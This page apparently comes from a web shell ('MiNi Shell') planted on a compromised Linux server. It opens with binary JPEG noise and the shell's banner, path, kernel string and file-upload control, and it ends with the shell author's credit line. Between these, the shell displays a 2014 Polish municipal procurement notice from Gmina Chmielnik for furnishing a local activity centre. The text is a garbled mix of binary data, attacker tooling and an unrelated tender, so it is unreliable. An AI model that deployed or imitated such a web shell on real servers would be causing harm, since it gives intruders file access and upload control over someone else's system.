JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/138935-N-2014.html

<p class="kh_header"><b>Chmielnik: Zakup, dostawa i montaż wyposażenia do Centrum Aktywności Lokalnej 
w Śladkowie Małym, gmina Chmielnik</b><br>
<b>Numer ogłoszenia: 138935 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 3543273, faks 41 3543273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chmielnik.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i montaż wyposażenia do Centrum Aktywności Lokalnej 
w Śladkowie Małym, gmina Chmielnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa i montaż wyposażenia do Centrum Aktywności Lokalnej w Śladkowie Małym zgodnie z podziałem na części asortymentowe: 
I część - Meble,
II część - Sprzęt RTV, AGD,
III część - Sprzęt do ćwiczeń,
IV część - Artykuły różne.
Poszczególne części zamówienia obejmują następujące elementy wyposażenia:

I część: MEBLE
1. Stół  2- osobowy ze składanymi nogami
blat z płyty laminowanej 0,75m x 0,75m, stelaż z rury stalowej, nogi składane - 31 szt.
2.Krzesło świetlicowe -stelaż z rury stalowej, siedzisko i oparcie ze sklejki - 60szt.
3. Meble kuchenne 
zabudowa obejmuje szafki stojące na dług. ok. 3m  oraz stojące i wiszące na dł. ok. 3m wykonane z płyty meblowej wiórowej laminowanej obustronnie o grub. 18 mm.  Dodatkowo szafka pod zlewozmywak o długości 120 cm i szafka na butlę gazową z blatem.
Typ frontu: płyta meblowa gładka, kolor calvados lub odcień ciemnego brązu , blat kuchenny  laminowany o grubości 28 mm w odcieniach beżu, zawiasy puszkowe 35 mm z prowadnikiem euro, po dwa dla każdego frontu, system samodomykania szuflad, częściowy wysuw szuflad, ściana tylna z płyty pilśniowej, przednie krawędzie korpusu oklejone obrzeżem PVC w kolorze płyty,
Szafki stojące posadowione na nogach metalowych, wys. szafki 85 cm, szafki wiszące o wysokości 90 cm, głębokości 40 cm, pomiędzy blatem a ścianą listwa przyblatowa z silikonowymi uszczelkami. Szafki zamykane na klucz.
Uchwyty frontów metalowe dobrane  odpowiednio do wielkości frontów w kolorystyce wybranej przez Zamawiającego z przedstawionego katalogu .Nad zlewozmywakiem należy zamontować suszarkę/ ociekacz dwurzędowy na zastawę  stołową na długości ok. 1,5 m. bez szafki.
4. Regały na zastawę stołową
1) regał na zastawę stołową w pom.  magazynowym  o wymiarach 2,0 m x 2m x 0,5 m gł. ( lub 2 szt. złączone o wym. 1m x 2m x 0,5 m) wykonane z płyty meblowej wiórowej laminowanej obustronnie o grub. 18 mm. Półki wzmacniane.  Kolor calvados lub ciemny brąz. Zamykane na klucz.
2) regał na zastawę stołową o wymiarach1,2m  x  2,0m x 0,5m. Parametry j.w.
5. Karnisze:
1).jednobiegowy o dług. 2,2 m, - 1 szt.
2).dwubiegowe  o dług. 2,2m - 1 sz.
3).dwubiegowe o dług. 2,0m - 2 szt.
4).jednobiegowy o dług. 2,5 m - 1 szt.
Karnisze metalowe rurki o średnicach 25mm i 16 mm  z kompletem zamocowań, zakończeń,  kółek, żabek, kolor stare złoto.
6. Wieszaki szatniowe mocowane do ściany
haki w płytach meblowych zamontowanych do ścian:
- Płyta o dług. 1,2 m  wraz z półką na czapki,
- Płyta o dług. 1,2m bez półki,
- Płyta o dług. 1,6 m bez półki.
7. Biurko komputerowe - 2 szt.
wymiary: 87 wys x 160 szer, x 55 gł. Z płyty wiórowej laminowanej, półka na klawiaturę, nadstawka pod monitor, otwory przelotowe do kabli,
8.Fotel obrotowy - 2 szt. - odchylane oparcie, siedzisko i oparcie z materiału, regulacja wysokości oparcia  i siedziska, amortyzacja siedziska
9. Szafa ubraniowa z drążkiem - 2 szt.
szer. 1,2m x 2,0 m wys. x 0,60m głęb. Z płyty wiórowej laminowanej, górną z półką.
10. Gablota stojąca - 2 szt.
gablota przeszklona, tylna ściana z płyty, liczba półek 4, wymiary 200x120x50
11. Regał metalowy z półkami - 3 szt.
Regał o konstrukcji metalowej z 5 - cioma półkami o głębokości 50 cm, szerokość regału 1,5 m
12.Zestaw : stoły ogrodowe i  ławki ogrodowe składane
Stoły i ławki na imprezy plenerowe, blat i siedziska z drewna, nogi stołu i ławek z metalu, wymiary: stół: 2000x600x750 mm, ławka 2000x250x460mm, 
15 stołów i 50 ławek
13. Wieszaki stojące -Drewniane, przenośne - 3 szt.
14.Stół roboczy kuchenny -  wykonany ze stali nierdzewnej, z półką, wymiary 120 cm szer. x 60 cm gł. x 85 cm wys.
15. Regał  na obuwie
Korpus wykonany z płyty wiórowej laminowanej obustronnie o grubości 18 mm. Wymiary 1,2 m szer. x 1,2 wys. x 0,5 m gł. bez frontów
16. Tablica korkowa - 2 szt.
Powierzchnia korkowa, rama w kolorze dębu, do zawieszenia na  ścianie, z elementami mocującymi, wymiary: 120 x 90
17.Folia samoprzylepna do szyb
Folia samoprzylepna do oklejenia szyb w oknach  i drzwiach, przepuszczająca światło, matująca, gładka struktura, wymiary:
- 0,8m x 1,25 m - 1 szt.
- 0,75m x 1,4m - 2 szt.
II część: SPRZĘT RTV, AGD:
1.Patelnia elektryczna z wanną żeliwną , powierzchnia robocza płyty 0,25 m2 -1 szt.
2. Czajnik elektryczny pojemność 1,7 l	-2 szt.
3. Chłodziarka wolnostojąca, typ side by side, wymiary ok.. 91 x 180, klasa energetyczna A+, dwudrzwiowa,	-1szt.
5.Zamrażarka szufladowa, biała, pojemność 260l, klasa energetyczna A+ -1 szt
6.Zmywarka do naczyń klasa A+, szerokość 60 cm, pojemność 12 kompletów, -1 szt.
7.Warnik do wody 30 litrów, ze stali nierdzewnej, z kranem -1szt.
8. Telewizor LCD, 40 cali LED, rozdzielczość FULL HD, system dźwięku przestrzennego SRS Tru Surround, z modułem do odbioru telewizji naziemnej,	-1 szt.
9. Wentylatory sufitowe-4 łopatki, średnica ok. 1,3 m, 3 stopnie prędkości	-3 szt.

III część: SPRZĘT DO ĆWICZEŃ 
1.Gra stołowa piłkarzyki -z płyty MDF, wym. 145cm x 130 cm, pole gry 115x70 cm -1 szt.
2. Rower treningowy - ok.15 rodzajów treningu, 15 stopni oporu, ekran dotykowy z funkcjami speed, time, distance, calorie, pulse	-1 szt.
3. Bieżnia - prędkość do 13 km/h, pomiar tętna, programy komputera: prędkość, dystans, czas treningu, kalorie -1szt.
4. Stepper - max obciążenie 80 kg, komputer treningowy, linki i uchwyty do ćwiczenia ramion -	1 szt.
5. Ławka do ćwiczeń ze sztangą, sztanga, stojak na sztangę, gryf prosty 180 cm, obciążenie 60 kg, wyciskanie na ławeczce leżąc, regulacja oparcia, prostowanie nóg, uginanie kolan, max obciążenie 150 kg łącznie z obciążeniem-1 szt.
6.Wiosła do ćwiczeń - profile stalowe, komputer zliczający czas ćwiczeń, ilość ruchów wiosłami, tempo, spalone kalorie, regulator oporu hydraulicznego, wygodne siedzisko, wykonanie z profili stalowych, max waga ćwiczącego 130 kg -1 szt.
IV część: ARTYKUŁY RÓŻNE
 
1.Garnki ze stali nierdzewnej z pokrywkami - stal nierdzewna, pojemność 10l, 15l, 20l, 30 l. - 4 szt.
2.Dozownik na mydło w płynie - uchwyt plastikowy mocowany do ściany, pojemnik na mydło z dozownikiem plastikowym -	6 szt.
3. Uchwyt na ręczniki papierowe chromowany , mocowany do ściany	-5 szt.
4.Lustra łazienkowe do zawieszenia nad umywalką, bez oprawy, prostokątne, bez podświetlenia, bez półki -	6 szt.
5. Pojemniki na papier toaletowy chromowane, z klapką, zamocowane do ściany- 5 szt
6.Szczotki do WC - uchwyt chromowany, stojące	 -5 szt.
7. Kosz na odpady( łazienkowy ) z tworzywa sztucznego z uchylną pokrywą, o pojemnościach: 15 litrów - 6 szt. i 25 litrów - 6 szt.	
8. Kosz na odpady kuchenne z tworzywa sztucznego z uchylną pokrywą, pojemność: 50l - 2 szt.	
9. Kosz na odpady zewnętrzny -pojemność 35 l, do zabetonowania w gruncie, metalowy	-2 szt.
10.  Kosz stojak na worki na śmieci
Kosz stojak na worki 120 l, z zamykana pokrywą, regulowana wysokość- 6 szt.
11.Firanki - firanki żakardowe uszyte na taśmie , z delikatnym wzorem, wymiary firanek:
1).	1,4 wys. x 4,5m - 1 szt.
2).	1,8 m x 5 m - 3 szt.
3).	2,9m wys. x 2m - 2 szt.( do drzwi balkonowych) 				
12. Lambrekiny woalowe
                     
Stylizacja zbliżona do przedstawionych rysunków, lambrekiny proste, woalowe, podkreślające okno, do karniszy o długościach:
- 2 m - 2 szt.
- 2,2 m - 1 szt.	3 szt.
13. Rolety do okien dachowych
rolety materiałowe do okien dachowych z prowadnicami, osłona kasetowa rolety, samohamujący mechanizm łańcuszkowy, wymiary rolet:
- 0,62 m x 0,95 m - 6 szt.
Kolor: odcienie żółtego
14.  Rolety do okien - rolety materiałowe do okien z prowadnicami, osłoną kasetową, samohamującym mechanizmem łańcuszkowym,  wymiary:
- 0,75 x 0,98 - 4 szt.
- 0,70 x 1,3 - 2 szt.
- 0,38 x 1,36 - 2 szt.
- 0,55 x 1,36 - 4 szt. kolor: odcienie żółtego	
15. Namiot ogrodowy - stelaż stalowy, powłoka z wodododpornego poliestru impregnowanego, wymiary 3x3 m -3 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust.1 pkt. 7 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.71.00.00-2, 37.44.00.00-4, 37.46.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy Załącznik Nr 1 do SIWZ- wymagana forma - ORYGINAŁ
2. Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy - wymagana forma - ORYGINAŁ lub odpis pełnomocnictwa poświadczony za zgodność z oryginałem przez notariusza;
3. Oświadczenie o podwykonawcach - Załącznik nr 5 do SIWZ - wymagana forma - ORYGINAŁ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chmielniku, pl. Kościuszki 7, 26-020 Chmielnik pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Chmielniku, pl. Kościuszki 7, 26-020 Chmielnik pok. 102 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ubiega sie o uzyskanie dofinansowania z Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w opisie przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt RTV, AGD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w opisie przedmiotu zamowienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt do ćwiczeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w opisie zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.46.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak w opisie przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com